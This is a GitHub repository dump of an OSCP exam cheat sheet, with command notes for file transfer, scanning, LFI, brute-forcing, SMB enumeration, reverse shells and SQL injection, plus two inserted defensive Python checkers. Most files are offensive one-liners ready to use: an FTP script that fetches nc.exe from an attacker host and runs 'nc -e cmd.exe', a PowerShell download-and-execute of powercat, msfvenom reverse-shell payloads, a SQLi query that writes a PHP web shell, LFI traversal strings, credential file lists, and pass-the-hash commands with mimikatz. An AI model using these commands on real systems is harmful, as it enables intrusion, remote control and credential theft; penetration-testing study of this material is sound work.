Full Code of omurugur/OSCP for AI

Repository: omurugur/OSCP
Branch: main
Commit: 84e748a21063
Files: 12
Total size: 26.8 KB

Directory structure:
gitextract_s2w0yhy0/

├── File_Transfer
├── Index_Detection
├── LFI
├── LICENSE
├── Password_Attack
├── Port_Scan
├── Port_Scan_By_Ports
├── README.md
├── Reverse_Shell
├── Road_Map
├── SQLi
└── Useful_Resources

================================================
FILE CONTENTS
================================================

================================================
FILE: File_Transfer
================================================
#With Curl
curl http://XX.XX.XX.XX/test.sh --output test.sh
------------------------
#Paste the following code on the victim to fetch nc over FTP (keep the space before > : cmd.exe treats "21>" as a handle redirect and drops the "1"):
echo open <attacker_ip> 21 > ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
nc.exe <attacker_ip> 1234 -e cmd.exe
------------------------
#Bounce port scanning
$ nc $ip 21
220 Femitter FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS foo
230 User anonymous logged in.
PORT 127,0,0,1,0,80
200 Port command successful.
LIST
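The PORT line in the transcript above is what makes a bounce scan work: the client asks the server to open its data connection to 127.0.0.1:80, so the server probes its own loopback port. As an added example (not code from the omurugur/OSCP repository), the Python below implements the server-side check that defeats it: parse the PORT/EPRT target and accept it only when it equals the control-connection peer on an unprivileged port. The client address 10.0.0.5 and the transcript lines are constructed for the example.

```python
"""Server-side check against FTP bounce scanning via PORT/EPRT.

Added example; not part of the omurugur/OSCP repository. The client
address 10.0.0.5 and SAMPLE_TRANSCRIPT are constructed for the example.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# PORT h1,h2,h3,h4,p1,p2 (RFC 959): four address octets, then port = p1*256 + p2
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)
# EPRT <d><proto><d><address><d><port><d> (RFC 2428); <d> is any delimiter char
EPRT_RE = re.compile(r"^EPRT\s+(\S)(.*)$", re.IGNORECASE)


@dataclass(frozen=True)
class DataTarget:
    host: str
    port: int


def parse_data_command(line: str) -> Optional[DataTarget]:
    """Decode the data-connection target requested by a PORT or EPRT line.

    Returns None when the line is not a well-formed PORT/EPRT command."""
    line = line.strip()
    m = PORT_RE.match(line)
    if m:
        fields = [int(x) for x in m.group(1).split(",")]
        if any(f > 255 for f in fields):
            return None
        host = ".".join(str(f) for f in fields[:4])
        return DataTarget(host, fields[4] * 256 + fields[5])
    m = EPRT_RE.match(line)
    if m:
        delim, rest = m.group(1), m.group(2)
        parts = rest.split(delim)   # "1|127.0.0.1|80|" -> ["1", "127.0.0.1", "80", ""]
        if len(parts) < 4 or parts[0] not in ("1", "2") or not parts[2].isdigit():
            return None
        try:
            ipaddress.ip_address(parts[1])
        except ValueError:
            return None
        port = int(parts[2])
        if not 0 < port <= 65535:
            return None
        return DataTarget(parts[1], port)
    return None


def evaluate(client_ip: str, line: str) -> str:
    """Classify one control-channel line sent by client_ip.

    'ignore' - not a PORT/EPRT command
    'reject' - malformed, points at a host other than the client itself
               (bounce attempt), or names a privileged port (< 1024)
    'accept' - target is the control-connection peer on a high port
    """
    stripped = line.strip()
    is_data_cmd = stripped.upper().startswith(("PORT ", "EPRT "))
    target = parse_data_command(stripped)
    if target is None:
        return "reject" if is_data_cmd else "ignore"
    if target.host != client_ip:
        return "reject"   # server would otherwise connect to a third host or its own loopback
    if target.port < 1024:
        return "reject"   # conventional check: refuse privileged ports on the client side
    return "accept"


def audit_transcript(client_ip: str, lines: List[str]) -> List[Tuple[str, str]]:
    """Run evaluate() over a client-side transcript; returns (line, verdict)
    for every PORT/EPRT command so bounce attempts can be logged."""
    return [(ln.strip(), evaluate(client_ip, ln))
            for ln in lines if ln.strip().upper().startswith(("PORT ", "EPRT "))]


# Constructed sample: the bounce attempt from the transcript above, plus a
# legitimate active-mode request from the same client.
SAMPLE_CLIENT = "10.0.0.5"
SAMPLE_TRANSCRIPT = [
    "USER anonymous",
    "PASS foo",
    "PORT 127,0,0,1,0,80",      # bounce: server asked to connect to its own loopback:80
    "LIST",
    "PORT 10,0,0,5,4,1",        # legitimate: client 10.0.0.5, port 4*256+1 = 1025
    "EPRT |1|127.0.0.1|80|",    # the same bounce via the extended command
]

if __name__ == "__main__":
    for cmd, verdict in audit_transcript(SAMPLE_CLIENT, SAMPLE_TRANSCRIPT):
        print(f"{verdict:7s} {cmd}")
```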
------------------------
#Nice trick to share folders with RDP:
$ rdesktop (ip) -r disk:share=/home/bayo/store
------------------------
#With powershell:
$ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')"
------------------------
#Paste the following block in a command line to get a web client:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run with:
$ cscript wget.vbs http://<attacker_ip>/nc.exe nc.exe


================================================
FILE: Index_Detection
================================================
#GOBUSTER
• gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
------------------------
#with ssl GOBUSTER (-k skips certificate verification)
• gobuster dir -u https://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
------------------------
#DiRB
• dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
------------------------
#Davtest
• davtest -url http://XX.XX.XX.XX
------------------------
#WPScan
• wpscan --url https://omurugur.com/ --disable-tls-checks --enumerate p,t,u
• wpscan --url https://omurugur.com/ --disable-tls-checks --api-token <redacted>
• wpscan --url  https://omurugur.com/  -e ap 


================================================
FILE: LFI
================================================
#Useful LFI payloads (null byte, filter bypass, double encoding)
../../../../../etc/passwd%00
....//....//....//....//....//etc/passwd%00
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
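The three payloads above each defeat a different naive filter: %00 truncates the path in runtimes that hand it to a C string API, "....//" survives a single non-recursive removal of "../", and %252f is "/" URL-encoded twice. As an added example (not code from the omurugur/OSCP repository), the Python below is the resolver a defender would want: it decodes repeatedly, rejects NUL bytes and absolute paths, and returns only paths that normalise to somewhere inside the web root, next to the weak replace-once filter that the "....//" form is built to slip past. The web root /var/www/html and the request values are assumed.

```python
"""Resolver and classifier for the LFI payload encodings listed above.

Added example; not part of the omurugur/OSCP repository. WEB_ROOT and
SAMPLE_VALUES are assumed / constructed for the example.
"""
import posixpath
from typing import Optional, Tuple
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed web root


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable, so %252f -> %2f -> / is seen as a slash.
    The round limit keeps deeply nested encodings from looping."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_include(user_value: str, web_root: str = WEB_ROOT) -> Tuple[str, Optional[str]]:
    """Classify a user-supplied include path and resolve it when safe.

    Returns (verdict, resolved_path). verdict is one of:
      'nul_byte'   - contains %00 / NUL after decoding
      'absolute'   - starts with '/', would bypass the web root entirely
      'traversal'  - normalised path escapes the web root
      'suspicious' - has '..'-style segments but stays inside the root
                     (e.g. the "....//" probe aimed at a weaker filter)
      'ok'         - resolved_path is a file under web_root
    resolved_path is None for every verdict except 'ok'.
    """
    decoded = decode_fully(user_value)
    if "\x00" in decoded:
        return "nul_byte", None
    if decoded.startswith("/"):
        return "absolute", None
    candidate = posixpath.normpath(posixpath.join(web_root, decoded))
    if candidate != web_root and not candidate.startswith(web_root.rstrip("/") + "/"):
        return "traversal", None
    segments = decoded.split("/")
    if any(seg == ".." or (len(seg) >= 2 and set(seg) == {"."}) for seg in segments):
        return "suspicious", None
    return "ok", candidate


def weak_filter_resolve(user_value: str, web_root: str = WEB_ROOT) -> str:
    """The flawed pattern the "....//" payload is built for: decode once,
    delete "../" once, then concatenate without checking the result.
    Kept only to show why check_include() normalises instead."""
    decoded = unquote(user_value)
    stripped = decoded.replace("../", "")   # each "....//" collapses to "../"
    return posixpath.normpath(posixpath.join(web_root, stripped))


# Constructed request values: the three payloads listed above, the "....//"
# form without the null byte, and a benign include.
SAMPLE_VALUES = [
    "../../../../../etc/passwd%00",
    "....//....//....//....//....//etc/passwd%00",
    "..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
    "....//....//....//....//....//etc/passwd",
    "pages/about.php",
]

if __name__ == "__main__":
    for value in SAMPLE_VALUES:
        verdict, path = check_include(value)
        print(f"{verdict:10s} {value!r} -> {path}")
    print("weak filter would open:", weak_filter_resolve(SAMPLE_VALUES[3]))
```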
------------------------
#Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
------------------------
#Apache:
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
------------------------
#Log Files:
Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log
Debian/Ubuntu-   /var/log/apache2/access.log
FreeBSD-   /var/log/httpd-access.log
------------------------
#Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
------------------------
#MySql:
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
------------------------
#Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
------------------------


================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2021 Ömür Uğur

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: Password_Attack
================================================
#SSH Attack with THC-Hydra
• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
------------------------
#Remote Desktop Protocol Attack with Crowbar
• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1
------------------------
#HTTP htaccess Attack with Medusa
• medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
------------------------
#HTTP POST Attack with THC-Hydra
• hydra XX.XX.XX.XX http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f


================================================
FILE: Port_Scan
================================================
#Nmap
• nmap -sC -sV -O XX.XX.XX.XX
• nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX
• nmap -p- -v <targetip>
• nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX
------------------------
#TCP Top 1000
• nmap -Pn -sC -sV -oA tcp -vv $ip
------------------------
#All TCP Ports:
• nmap -Pn -sC -sV -oA all -vv -p- $ip
------------------------
#UDP Top 100:
• nmap -Pn -sU --top-ports 100 -oA udp -vv $ip
• unicornscan -mU -v -I XX.XX.XX.XX
------------------------
#No Ping 
• nmap -sV -sC -O -Pn XX.XX.XX.XX
------------------------
#All Port 
• nmap -sV -sC -O -Pn  -p 1-65535 XX.XX.XX.XX
------------------------
#Nmap: detect live hosts and write them to a file
• nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt 
------------------------
#UDP Scan
• nmap --top-ports 200 -sU -A XX.XX.XX.XX
------------------------
#With Netcat
• nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390


================================================
FILE: Port_Scan_By_Ports
================================================
#SSH
• nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX
------------------------
#SNMP
• sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt
• snmpwalk -c public -v1 -t 10 XX.XX.XX.XX
• snmp-check -t $ip -c public
• nmap -sU -p161 --script "snmp-*" $ip
------------------------
#Enumerating Windows Users
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25
------------------------
#Enumerating Running Windows Processes
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2
------------------------
#Enumerating Open TCP Ports
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3
------------------------
#Enumerating Installed Software
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2
------------------------
#SMTP
#telnet or netcat connection
• nc <targetip> 25
• VRFY root
------------------------
#Check for commands
• nmap -script smtp-commands.nse <targetip>
• nmap XX.XX.XX.XX -p 25 --script=smtp-*
• nc -nv XX.XX.XX.XX 25
------------------------
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
------------------------
#Always do user enumeration
• smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
• smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt  -t $ip
------------------------
#SMB
------------------------
#Enumerate Hostname
• nmblookup -A $ip
------------------------
#List Shares
• smbmap -H $ip
• echo exit | smbclient -L \\\\$ip
• nmap --script smb-enum-shares -p 139,445 $ip
• smbclient -N -L //XX.XX.XX.XX
------------------------
#Check Null Sessions
• smbmap -H $ip
• rpcclient -U "" -N $ip
• smbclient -N -L \\\\XX.XX.XX.XX\\
• smbclient \\\\$ip\\[share name]
• smbclient -L XX.XX.XX.XX --option='client min protocol=NT1'
• smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1'
• smbclient \\\\XX.XX.XX.XX\\'bob share' --option='client min protocol=NT1'
------------------------
#Check for Vulnerabilities - 
nmap --script smb-vuln* -p 139,445 $ip
------------------------
#Overall Scan - 
enum4linux -a $ip
------------------------
#Manual Inspection
• smbver.sh $ip (port)
------------------------
#rpcclient
• rpcclient -U '' $ip
• Password:
• rpcclient $> srvinfo # operating system version
• rpcclient $> netshareenumall # enumerate all shares and its paths
• rpcclient $> enumdomusers # enumerate usernames defined on the server
• rpcclient $> getdompwinfo # smb password policy configured on the server
------------------------
#CrackMapExec
• crackmapexec smb -u 'guest' -p '' --shares $ip
• crackmapexec smb -u 'guest' -p '' --rid-brute 4000 $ip
• crackmapexec smb -u 'guest' -p '' --users $ip
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
• crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24
• crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
• crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip # reliable pth code execution
------------------------
#smbmap
• smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
• smbmap -u guest -p '' -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap; great when smbclient doesn't work
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # does not work
------------------------
# Share List:
• smbclient --list <targetip>
• smbclient -L <targetip>
• smbclient -L //XX.XX.XX.XX
------------------------
# SMB Client:
• smbclient //XX.XX.XX.XX/pathname
• smbclient -L  //XX.XX.XX.XX
------------------------
# SMB Map:
• smbmap -H XX.XX.XX.XX
• smbmap -H XX.XX.XX.XX -R  --depth 5
• smbmap -H htb.local -u <username> -p <password>
------------------------
# Check SMB vulnerabilities:
• nmap --script=smb-check-vulns.nse <targetip> -p445
• nmap --script vuln XX.XX.XX.XX -p445
• nmap --script "vuln" <targetip> -p139,445
------------------------
# basic nmap scripts to enumerate shares and OS discovery
• nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse smb-os-discovery.nse
• nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX
------------------------
# Connect using Username
• smbclient -L <targetip> -U username -p 445
------------------------
# Connect to Shares
• smbclient \\\\<targetip>\\ShareName
• smbclient \\\\<targetip>\\ShareName -U User_name
------------------------
# enumerate SMB shares; -a is the "do everything" option
• enum4linux -a XX.XX.XX.XX
• enum4linux -i XX.XX.XX.XX
------------------------
# learn the machine name and then enumerate with smbclient
• nmblookup -A XX.XX.XX.XX
• smbclient -L <server_name> -I XX.XX.XX.XX
------------------------
# DNS ENUM
• dnsenum zonetransfer.me
------------------------
# DNS RECON
• dnsrecon -d okmurugur.com -t axfr
• dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8
------------------------
# DNS ENUMERATION
• host www.okmurugur.com
• host -t mx okmurugur.com
• host -t txt okmurugur.com
------------------------
# dig
• dig axfr  @XX.XX.XX.XX okmurugur.com


================================================
FILE: README.md
================================================
<div class="Box-body">
<article class="markdown-body entry-content p-5" itemprop="text">
<h1><a id="user-content-birdwatcher" class="anchor" aria-hidden="true" href="#CEH_v10_Dumps"></a>OSCP ( Offensive Security Certified Professional )</h1>
<p>
<a target="_blank" rel="noopener noreferrer" href="https://opensource.org/licenses/MIT">MIT License</a>
<a target="_blank" rel="noopener noreferrer" href="https://liberapay.com/slife/donate">Donate using Liberapay</a>
</p>

<p><b>Overview:</b></p>

<p>Penetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here.</p>

<p>This online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification.</p>

<p>To learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post.</p>

<p>You can find my experience with the OSCP certification exam, which I took and passed in 2021, on my <a href="https://www.justsecnow.com/oscp-offensive-security-certified-professional-inceleme-ve-sinavi/">site</a>. I wish success to the friends who will take the exam.</p>

<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#References"></a>References</h2>

<p>• https://www.offensive-security.com/pwk-oscp/</p>

<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#Download"></a>Download</h2>

<h5>Cloning an Existing Repository ( Clone with HTTPS )</h5>
<pre><code>root@slife:~# git clone https://github.com/omurugur/OSCP.git
</code></pre>
<h5>Cloning an Existing Repository ( Clone with SSH )</h5>
<pre><code>root@slife:~# git clone git@github.com:omurugur/OSCP.git
</code></pre>

<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#Contact"></a>Contact</h2>

<h5>Mail : omurugur12@gmail.com</h5>

<h5>Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/</h5>

<h5>GitHub : https://github.com/omurugur</h5>

<h5>Twitter : https://twitter.com/omurugurrr</h5>

<h5>Medium : https://omurugur.medium.com/</h5>

<h5>Donate!</h5>
<p>Support the authors:</p>
</article>
</div>


================================================
FILE: Reverse_Shell
================================================
# Interactive TTY Shell
• python -c 'import pty; pty.spawn("/bin/sh")'
• python -c 'import pty;pty.spawn("/bin/bash")'
• python -c 'import pty; pty.spawn("/bin/bash")'
• /usr/bin/script -qc /bin/bash /dev/null
------------------------
# With Powershell 
• powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd"
------------------------
# Reverse Shell 
#Linux
• msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f elf > shell.elf
# PHP
• msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.php
# ASP
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp
# WAR
• msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f war > shell.war
# JSP
• msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.jsp
# Exe
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=445 -f exe -o shell_reverse.exe
# ASPX
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f aspx > shell.aspx
# ASPX-x64
• msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=1234 -f aspx > 4.aspx
------------------------
#Shell From SQL Injection
• Windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
• Linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'


================================================
FILE: Road_Map
================================================

Network Scanning

Service Scanning

    WebApp
      ☐   Nikto 
      ☐   dirb
      ☐   dirbuster
      ☐   wpscan
      ☐   dotdotpwn
      ☐   view source 
      ☐   davtest\cadaver
      ☐   droopscan
      ☐   joomscan
      ☐   LFI\RFI Test
      ☐   SQL injection
      ☐   Default password search
      
    Linux\Windows
      ☒   snmpwalk -c public -v1 ipaddress 1
      ☐   smbclient -L //ipaddress
      ☐   showmount -e ipaddress port
      ☐   rpcinfo
      ☐   Enum4Linux
    
    Anything Else
      ☐   nmap scripts (locate *nse* | grep servicename)
      ☐   hydra
      ☐   MSF Aux Modules
      ☐   Download the software

Exploitation
   ☐   Gather Version Numbers
   ☐   Searchsploit
   ☐   Default Creds
   ☐   Creds Previously Gathered
   ☐   Download the software

Post Exploitation

    Linux
      ☐   linux-local-enum.sh
      ☐   linuxprivchecker.py
      ☐   linux-exploit-suggester.sh
      ☐   unix-privesc-check.py

    Windows
      ☐   wpc.exe
      ☐   windows-exploit-suggester.py
      ☐   windows_privesc_check.py
      ☐  windows-privesc-check2.exe

Priv Escalation
   ☐  access internal services (portfwd)
   ☐  add account

Windows
   ☐  List of exploits

Linux
   ☐  sudo su 
   ☐  KernelDB
   ☐  Searchsploit

Final
   ☐  Screenshot of IPConfig\WhoamI
   ☐  Copy proof.txt
   ☐  Dump hashes 
   ☐  Dump SSH Keys
   ☐  Delete files


================================================
FILE: SQLi
================================================
#sqlmap
☐ sqlmap -r name.txt --batch --force-ssl
☐ sqlmap -r name.txt --dbms mysql --technique=U --dump  --batch
☐ sqlmap -r name.txt --dbms mysql --technique=U --users
☐ sqlmap -r name.txt --dbms mysql --technique=U  --passwords
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --dump
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --os-shell
------------------------



================================================
FILE: Useful_Resources
================================================
Blog :
My experience with the OSCP certification — Security Café
PWK and OSCP my experience | Fady Osman’s Technical Blog
Offensive Security’s PWB and OSCP — My Experience — Security Sift
Penetration Testing With Backtrack — OSCP — Things all the hacking
Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)
OSCP Course and Exam Review — RCE Security
Try Harder! An OSCP Review. Blog of Jason Bernier
Pentest Tips and Tricks — EK
Open Security Research: Using Mimikatz to Dump Passwords!
Hacking/OSCP cheatsheet :: Ceso Adventures
The CORE Hacking Course — YouTube
Uploading a web.config File for Fun and Profit | Soroush Dalili (@irsdl) — سروش دلیلی
NetSecFocus Trophy Room — Google Drive
Enumeration :
oscp/linux-template.md at master · xapax/oscp
oscp/windows-template.md at master · xapax/oscp
CTF Series : Vulnerable Machines — tech.bitvijays.com
PWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff
nmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator
Privilege_Escalation_Windows:
Windows Privilege Escalation Guide
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows elevation of privileges
(1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube
PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit
WindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum
Windows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester
Windows Privilege Escalation Methods for Pentesters — Pentest Blog
Windows Local Privilege Escalation — HackTricks
GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.
Ghostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
Ghostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
privilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite
bitsadmin/wesng: Windows Exploit Suggester — Next Generation
rasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
SecWiki/windows-kernel-exploits: windows-kernel-exploits, a collection of Windows platform privilege-escalation vulnerabilities
Neohapsis/creddump7
juicy-potato/README.md at master · ohpe/juicy-potato
antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System
itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019
Privilege_Escalation_Linux:
sagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop
Linux elevation of privileges
LinEnum/LinEnum.sh at master · rebootuser/LinEnum
Basic Linux Privilege Escalation
Linux Privilege Escalation Scripts
Linux Privilege Escalation — HackTricks
diego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
Linux Privilege Escalation Using Cronjobs
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
linted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script
AlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac
unix-privesc-check | pentestmonkey
jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester
Privilege Escalation Methods in Linux Penetration Tests | SİBER GÜVENLİK PORTALİ
Reverse_Shell:
reverseshell | pentestmonkey
netcat 1.11 for Win32/Win64
Upgrading Simple Shells to Fully Interactive TTYs — ropnop blog
Spawning a TTY Shell
Reverse Shell Cheat Sheet | pentestmonkey
Reverse Shell Cheat Sheet
Remote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell
BOF:
PWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog
Exploiting a Stack-Based Buffer Overflow Vulnerability in Seattle Lab Mail (SLmail) 5.5 | SİBER GÜVENLİK PORTALİ
